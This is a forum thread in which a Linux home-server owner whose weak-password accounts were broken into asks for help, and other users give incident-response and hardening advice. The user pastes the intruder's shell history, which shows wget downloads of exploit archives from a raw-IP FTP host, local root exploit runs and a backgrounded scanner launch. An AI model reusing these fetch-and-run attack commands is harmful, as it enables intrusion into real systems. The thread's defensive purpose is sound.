You are not logged in.
Pages: 1
Hi!
I use icecast+mpd to stream music to my workplace. to get that stream i use dyndns.
i also installed and configured sshd for remote control and vsftpd via xinetd. nothing bad so far i think.
the bad thing: i´ve set up some unprivileged users (username=password), very stupid i know.
to give some friends cheap and easy ftp access, to store some stuff (presentation for university e.g.).
and those users have ssh access too.
few days ago, i noticed due to cpu usage, thats something´s not right. I saw somebody logged into my machine, stopped sshd and
all other network related things. the user ran some scripts and i stoped them.
mainly some bash scripts using pscan2 (maybe this: http://packetstormsecurity.org/UNIX/scanners/pscan2.c )
all files were in the users home dir.
clamav, rkhunter and chkrootkit were only complaining about those files in the users homedir. (linux.rst.b)
nmap tells me that no port is opend, when my services are down.
now i am not sure if i am infected or if i was fast enough to stop that exploit(??)
nor i know what i should do now.
maybe someone can chenk my machine? i really don´t want to set it up again and hope thats not the only chance to sleep well again.
any advice? searching the web tells me that those tools that were used are about 6 years old.
i can put all that into are archive and upload it to rapidshare or so, if wanted.
sorry for my bad englich
greetings matto
// DAMNiAM //
Offline
By the sounds of it, you're probably root-kitted. Once you've been root-kitted, you can't really be 100% sure if it's been cleaned. Root kits are designed to hide themselves, but modifying things like ps and netstat etc.
Your safest option is to reinstall I'm afraid.
Are you familiar with our Forum Rules, and How To Ask Questions The Smart Way?
BlueHackers // fscanary // resticctl
Offline
Maybe you could fix things but If I was in your place I would reinstall everything. At least just to sleep well again.
Offline
If you noticed that the ps scan was running at 100% before you killed it, then you are probably OK. but like fukawi2 and ArchArael suggests, it's really hard to be sure.
Offline
I've never been in this situation, but if a rootkit modifies local binaries to hide itself, then couldn't you just boot from a live environment and run those scans off the live cd with the primary hdd mounted?
archlinux - please read this and this — twice — then ask questions.
--
http://rsontech.net | http://github.com/rson
Offline
Hi
thanks for your quick reply!
if i set up my machine again, can i keep my configuration files?
Are my private files .. infected or whatever with anything?
i set up my partitions as follows:
/dev/hdc2 on / type jfs (rw)
/dev/hdc5 on /var type jfs (rw)
/dev/hdc6 on /home type jfs (rw) // i can leave this unchanged, right?
/dev/hdc7 on /mnt/mukku type jfs (rw) // music
/dev/hdc8 on /mnt/zoix type jfs (rw) // backups, other stuff
a general question:
the attaker tries to get root using 2 exploits.
what if these exploits don´t work ? was it possible for him to do any damage?
can i check this using the same exploits?
has anyone here ever tried or heard of those exploits?
anything to think about, before i try it?
here is the relevant history part, till i stopped all connections
75 ps x
76 w
77 uname -a
78 cat /proc/cpuinfo
79 passwd
80 ps x
81 passwd
82 id
83 ifconfg
84 ifconfig
85 cat /proc/cpuinfo
86 mkdir .cornd
87 wget ftp://89.39.167.131/k/expl2008.zip
88 unzip expl2008.zip
89 rm -rf expl2008.zip
90 ./diane_lane
91 ./jessica_biel
92 ls -l
93 cd .cornd
94 rm -rf *
95 ls la
96 w
97 uptime
98 cat /etc/issue
99 uname -a
100 ps -afx
101 wget ftp://89.39.167.131/k/vip.tgz
102 tar zxvf vip.tgz
103 rm -rf vip.tgz
104 cd vip
105 chmod +x *
106 nohup ./start 92 >> /dev/null &
107 rm -rf vuln.txt
108 ps -x
i still have all these files, but moved to another dir, done with the "hacked" user
greetings matto
// DAMNiAM //
Offline
hi again!
@rson451:
Good idea, i did that right now. i downloaded "grml", what looked pretty well for me.
same results there.
i´ve just a last question. if there is any backdoor oder irc-bot installed, will i see it listening with nmap?
greetings matto
// DAMNiAM //
Offline
I've never been in this situation, but if a rootkit modifies local binaries to hide itself, then couldn't you just boot from a live environment and run those scans off the live cd with the primary hdd mounted?
In theory yes, however it's still difficult to be 100% sure... IMHO, better safe than sorry...
if i set up my machine again, can i keep my configuration files?
Are my private files .. infected or whatever with anything?
In theory, they shouldn't be infected, but it's hard to say... I would backup your home partition, then selectively restore your documents / music / etc and skip any .files or .folders incase something has been hidden in there. It's unlikely they hid anything in non-hidden folders as they have no way of knowing which folders you access regularly which would mean you would see strange files immediately.
here is the relevant history part, till i stopped all connections
<SNIP>
i still have all these files, but moved to another dir, done with the "hacked" user
That's interesting... I work in Network Security - would you mind tar'ing that up and sending to me? I'd love to have a closer look...
i´ve just a last question. if there is any backdoor oder irc-bot installed, will i see it listening with nmap?
If you're *SURE* your netstat hasn't been modified, then it will show... However if the root kit has modified netstat, then it will deliberatly hide it from you.
Are you familiar with our Forum Rules, and How To Ask Questions The Smart Way?
BlueHackers // fscanary // resticctl
Offline
No, nmap will not show you in all cases a hidden backdoor when you do a scan. If one uses for instance port knocking, nmap won't show you any activity. In general, however, this is rather improbable.
Offline
here is the relevant history part, till i stopped all connections
91 ./jessica_biel
jessica_biel is that kernel vmsplice exploit to get root powers that was found a couple of months back. That would have failed unless your system was very out of date.
You should google the other programs and see if you were vulnerable to any of them.
Edit: diane_lane is the same exploit as jessica_biel
Offline
I would do a complete reinstall.
I use the same basic setup as you outlined above, except the only ports open to the public are sshd(22) and port http(80), with root login disabled. To access everything else i use SSH tunnels. I tunnel Icecast for music and samba for file access over SSH. Since I'm using windows i use a modified putty that stores everything on a flash drive and attempts to reconnect on disconnect as well as the minimize to tray feature is really nice.
I would not use FTP for anything. I know it can be made secure, but really SSHFS for linux is a lot more secure and a lot easier to setup. For non linux users Samba is the way to go, for remote access I tunnel it over SSH see http://www.blisstonia.com/eolson/notes/smboverssh.php. Also, for most things like x11vnc/vncservers, be sure they only accept connections from localhost (your ssh tunnel).
Edit: When I'm at work i also use portable pidgin and portable Firefox to chat/browse the net. Check out dynamic port forwarding to tunnel all Firefox/pidgin traffic through your home computer to avoid firewalls and the local sys admins snooping on things.
Edit2: Here you can see my flash drive with all of my portable applications set up, and the modified putty setup with differant sessions saved.
Last edited by Ruckus (2008-11-25 00:17:02)
Offline
Pages: 1